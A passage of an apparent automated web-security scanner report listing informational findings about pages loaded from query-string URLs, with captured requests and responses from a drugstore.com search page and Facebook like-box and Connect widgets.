lenses" /> </div>...[SNIP]... <link rel="stylesheet" type="text/css" href="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/css/site/0/CSSMenuImageReplacement.asp?"/> <div id="WebstoreMenu_0_False" class="webstoremenu">...[SNIP]... <a onclick="javascript:window.open('http://drugstore.custhelp.com/cgi-bin/drugstore.cfg/php/enduser/ask.php?p_cv=3.501&p_pv=&p_prods=&p_cats=447%2C500%2C501&cat_lvl1=447&cat_lvl2=500&cat_lvl3=501','dshelp','width=800,height=550,scrollbars=yes,resizable=yes,status=no,menubar=yes,toolbar=no,location=no');return false;" href="http://drugstore.custhelp.com/cgi-bin/drugstore.cfg/php/enduser/ask.php?p_cv=3.501&p_pv=&p_prods=&p_cats=447%2C500%2C501&cat_lvl1=447&cat_lvl2=500&cat_lvl3=501"> Contact Us</a>...[SNIP]... <img title="" class="spacer" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/spacer.gif" height="1" width="5" vspace="0" hspace="0" border="0" alt=""/> </td>...[SNIP]... <img title="search results for ess" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/search_result_bar.gif" width=455 height=21 vspace=0 hspace=0 border=0 alt="search results for ess"> <br/>...[SNIP]... /rxsearch.asp?search=ess&expand=BD+Swab+Single+Use+Regular&trx=1Z5007" title="click to show the different types of BD Swab Single Use Regular"><img title="click to show the different types of BD Swab Single Use Regular" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of BD Swab Single Use Regular"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Butalbital%2DASA%2DCaffeine&trx=1Z5007" title="click to show the different types of Butalbital-ASA-Caffeine"><img title="click to show the different types of Butalbital-ASA-Caffeine" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Butalbital-ASA-Caffeine"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=E%2EE%2ES%2E+400&trx=1Z5007" title="click to show the different types of E.E.S. 400"><img title="click to show the different types of E.E.S. 400" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of E.E.S. 400"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=E%2EE%2ES%2E+Granules&trx=1Z5007" title="click to show the different types of E.E.S. Granules"><img title="click to show the different types of E.E.S. Granules" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of E.E.S. Granules"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Hydrocortisone+Ace%2DPramoxine&trx=1Z5007" title="click to show the different types of Hydrocortisone Ace-Pramoxine"><img title="click to show the different types of Hydrocortisone Ace-Pramoxine" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Hydrocortisone Ace-Pramoxine"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Lidocaine%2DHydrocortisone+Ace&trx=1Z5007" title="click to show the different types of Lidocaine-Hydrocortisone Ace"><img title="click to show the different types of Lidocaine-Hydrocortisone Ace" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Lidocaine-Hydrocortisone Ace"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Megace+ES&trx=1Z5007" title="click to show the different types of Megace ES"><img title="click to show the different types of Megace ES" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Megace ES"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Oxazepam&trx=1Z5007" title="click to show the different types of Oxazepam"><img title="click to show the different types of Oxazepam" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Oxazepam"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Proferrin+ES&trx=1Z5007" title="click to show the different types of Proferrin ES"><img title="click to show the different types of Proferrin ES" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Proferrin ES"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Proferrin%2DForte&trx=1Z5007" title="click to show the different types of Proferrin-Forte"><img title="click to show the different types of Proferrin-Forte" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Proferrin-Forte"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Vicodin&trx=1Z5007" title="click to show the different types of Vicodin"><img title="click to show the different types of Vicodin" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Vicodin"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Vicodin+ES&trx=1Z5007" title="click to show the different types of Vicodin ES"><img title="click to show the different types of Vicodin ES" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Vicodin ES"> <strong>...[SNIP]... /rxsearch.asp?search=ess&expand=Vicodin+HP&trx=1Z5007" title="click to show the different types of Vicodin HP"><img title="click to show the different types of Vicodin HP" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/pharmacy/expand.gif" width=12 height=12 vspace=0 hspace=5 border=0 alt="click to show the different types of Vicodin HP"> <strong>...[SNIP]... <img title="" class="spacer" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/spacer.gif" height="20" width="1" vspace="0" hspace="0" border="0" alt=""/> </td>...[SNIP]... <img title="" class="spacer" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/spacer.gif" height="10" width="1" vspace="0" hspace="0" border="0" alt=""/> </td>...[SNIP]... <img title="" class="spacer" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/spacer.gif" height="10" width="1" vspace="0" hspace="0" border="0" alt=""/> </td>...[SNIP]... <img title="" class="spacer" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/spacer.gif" height="1" width="153" vspace="0" hspace="0" border="0" alt=""/> <div id="rightNav" align="left">...[SNIP]... <a title="online chat support" href="http://drugstore.custhelp.com/app/chat/chat_launch/c/504" target="_blank"> .drugstore.com/catimg/134548/click_to_chat_space_1.gif" width="131" height="147"/>...[SNIP]... >Questions? Please visit our <a class="underlineRemove" id="help_url_general" href="http://drugstore.custhelp.com/" target="dshelp" onclick="javascript:window.open('http://drugstore.custhelp.com/','dshelp','width=800,height=550,scrollbars=yes,resizable=yes,status=no,menubar=yes,toolbar=no,location=no');return false;" title="site help pages" > site help pages</a>...[SNIP]... <area href="http://www.facebook.com/drugstore.com" shape="rect" alt="become a fan on Facebook" target="_blank" coords="10,29,42,63"/> <area href="http://www.twitter.com/drugstoredotcom" shape="rect" alt="follow us on Twitter" target="_blank" coords="53,29,83,62"/> ...[SNIP]... -right:10px;"><img src="http://www.paypal.com/en_US/i/logo/PayPal_mark_37x23.gif" border="0" alt="Paypal" title="Paypal" class="FooterPaymentButton"/> </div><div style="float:left;padding-right:10px;"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/icons/button_google.gif" border="0" alt="Google Checkout" title="Google Checkout" class="FooterPaymentButton"/> </div>...[SNIP]... =P8M2938N&content=/bmlweb/tk60rollingiw.html','billmelater','toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=700, height=750');"><img src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/icons/button_bml.gif" border="0" alt="Bill Me Later" title="Bill Me Later" style="vertical-align:top;"/> </a>...[SNIP]... <a href="http://privacy-policy.truste.com/click-with-confidence/wps/en/www.drugstore.com/seal_m" title="TRUSTe online privacy certification" target="_blank"> <img style="border: none" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/footer/button_truste.gif" alt="TRUSTe online privacy certification"/> </a>...[SNIP]... <img src=http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/img/footer/hp_legal.gif /> </div>...[SNIP]... UseColumn"><a class="FooterTermsOfUseColumn" id="help_url_copyright" href="http://drugstore.custhelp.com/cgi-bin/drugstore.cfg/php/enduser/std_adp.php?p_faqid=512" target="dshelp" onclick="javascript:window.open('http://drugstore.custhelp.com/cgi-bin/drugstore.cfg/php/enduser/std_adp.php?p_faqid=512','dshelp','width=800,height=550,scrollbars=yes,resizable=yes,status=no,menubar=yes,toolbar=no,location=no');return false;" title="Terms of Use" rel="nofollow"> Terms of Use</a>...[SNIP]... <script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/prototype.min.js?v=1.4.0"> </script><script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/lookahead/scriptaculous.js?v=1.5.2"> </script><script src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/scripts.asp?v=0.4"> </script>...[SNIP]... <script language="JavaScript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/web_analytics/s_code.js?v=0.1"> </script>...[SNIP]... <script type="text/javascript" src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/shoprunner_init.js"> </script>...[SNIP]... <script src="http://a216.g.akamai.net/f/216/580/1d/www.drugstore.com/js/3rdparty/shoprunner/edutl.js"> </script>...[SNIP]...
15.50. http://www.facebook.com/connect/connect.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/connect/connect.php
Issue detail
The page was loaded from a URL containing a query string:http://www.facebook.com/connect/connect.php?id=40433056905&connections=10&stream=1&css=http://www.port25.com/includes/port25.css http://external.ak.fbcdn.net/fbml_static_get.php?src=http%3A%2F%2Fwww.port25.com%2Fincludes%2Fport25.css&appid=40433056905&pv=1&sig=6c372a5cd847acf134aa33070254c162&filetype=css&cb=2 http://profile.ak.fbcdn.net/hprofile-ak-ash2/50102_632458375_7336_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/186786_100000432148533_3234718_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/187779_40433056905_1906704_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/211421_1189431982_979987_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/211693_632509738_6138797_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/274570_1604903775_3854528_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/41503_12819353_4545_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_592270954_1117_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/49870_510467534_4504_q.jpg http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js
Request
GET /connect/connect.php?id=40433056905&connections=10&stream=1&css=http://www.port25.com/includes/port25.css HTTP/1.1/products/prod_evalthanks.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
Response
HTTP/1.1 200 OK=false;</script><title>Connect</title><link type="text/css" rel="stylesheet" href="http://external.ak.fbcdn.net/fbml_static_get.php?src=http%3A%2F%2Fwww.port25.com%2Fincludes%2Fport25.css&appid=40433056905&pv=1&sig=6c372a5cd847acf134aa33070254c162&filetype=css&cb=2" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css" /> <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"> </script>...[SNIP]... .com/Port25" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187779_40433056905_1906704_q.jpg" alt="Port25 Solutions, Inc." /> </a>...[SNIP]... <img class="uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" id="stream_loading_indicator" width="32" height="32" /> </div>...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /> <div class="name">...[SNIP]... .com/linnemann" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49870_510467534_4504_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=632458375" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/50102_632458375_7336_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/brandon.aldridge3" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41503_12819353_4545_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/johana.prietto" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=592270954" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48905_592270954_1117_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=632509738" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211693_632509738_6138797_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/greg.babayans" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211421_1189431982_979987_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100002192430334" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" alt="" /> <div class="name">...[SNIP]... .com/lucasff" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274570_1604903775_3854528_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/bkmadhu" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186786_100000432148533_3234718_q.jpg" alt="" /> <div class="name">...[SNIP]...
15.51. http://www.facebook.com/plugins/likebox.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/plugins/likebox.php
Issue detail
The page was loaded from a URL containing a query string:http://www.facebook.com/plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33f42299%26origin%3Dhttp%253A%252F%252Fthehackernews.com%252Ff38284c19c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-Hacker-News%2F172819872731894&locale=en_US&sdk=joey&show_faces=true&stream=false&width=292 http://profile.ak.fbcdn.net/hprofile-ak-ash2/49546_100000147617291_5524_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/195418_100001815300207_7718717_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/203430_100001923114560_5058758_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/211495_100002604038031_6142559_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/261059_100002818221944_1768173176_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/273370_100000172584502_308975658_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275106_1562735743_7219073_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275445_1418224949_131699991_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275660_100001981990343_7522079_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/275875_100001999617244_2028111589_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/276439_172819872731894_1083760684_q.jpg http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css
Request
GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33f42299%26origin%3Dhttp%253A%252F%252Fthehackernews.com%252Ff38284c19c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-Hacker-News%2F172819872731894&locale=en_US&sdk=joey&show_faces=true&stream=false&width=292 HTTP/1.1/2011/09/godaddy-websites-compromised-with.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
Response
HTTP/1.1 200 OK=false;</script><title>Likebox</title><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css" /> <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"> </script>...[SNIP]... .com/thehackernews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276439_172819872731894_1083760684_q.jpg" alt="The Hacker News" /> </a>...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100001815300207" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195418_100001815300207_7718717_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100001923114560" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203430_100001923114560_5058758_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/jeetkhaira" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275106_1562735743_7219073_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/xta2yax" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211495_100002604038031_6142559_q.jpg" alt="" /> <div class="name">...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273370_100000172584502_308975658_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100001999617244" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275875_100001999617244_2028111589_q.jpg" alt="" /> <div class="name">...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/261059_100002818221944_1768173176_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/shabbir.sheikh3" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/49546_100000147617291_5524_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100001981990343" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275660_100001981990343_7522079_q.jpg" alt="" /> <div class="name">...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275445_1418224949_131699991_q.jpg" alt="" /> <div class="name">...[SNIP]...
15.52. http://www.facebook.com/plugins/likebox.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/plugins/likebox.php
Issue detail
The page was loaded from a URL containing a query string:http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fblackbaud&width=250&colorscheme=light&show_faces=true&stream=false&header=false&height=258 http://profile.ak.fbcdn.net/hprofile-ak-ash2/276199_100002826953626_7924076_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-ash2/41495_1045423104_6042_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/187014_1559065580_5489996_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/211650_100002508068335_2748329_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/274313_524798532_2104149_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/274942_647326559_982880372_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/276282_1261776886_1590269771_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/41391_1161550834_7811_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/41599_24193516583_7785751_q.jpg http://profile.ak.fbcdn.net/hprofile-ak-snc4/41765_664156628_47_q.jpg http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css
Request
GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fblackbaud&width=250&colorscheme=light&show_faces=true&stream=false&header=false&height=258 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM
Response
HTTP/1.1 200 OK=false;</script><title>Likebox</title><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/jSVhQVZmVYK.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/elwwSDjKYPa.css" /> <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"> </script><script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"> </script>...[SNIP]... .com/blackbaud" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41599_24193516583_7785751_q.jpg" alt="Blackbaud" /> </a>...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100002508068335" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211650_100002508068335_2748329_q.jpg" alt="" /> <div class="name">...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187014_1559065580_5489996_q.jpg" alt="" /> <div class="name">...[SNIP]... <img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274942_647326559_982880372_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/tauheedah" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41765_664156628_47_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=1161550834" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41391_1161550834_7811_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/kdavis1974" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274313_524798532_2104149_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/pwhitbeck" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/41495_1045423104_6042_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=1261776886" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276282_1261776886_1590269771_q.jpg" alt="" /> <div class="name">...[SNIP]... .com/profile.php?id=100002826953626" target="_blank"><img class="img" 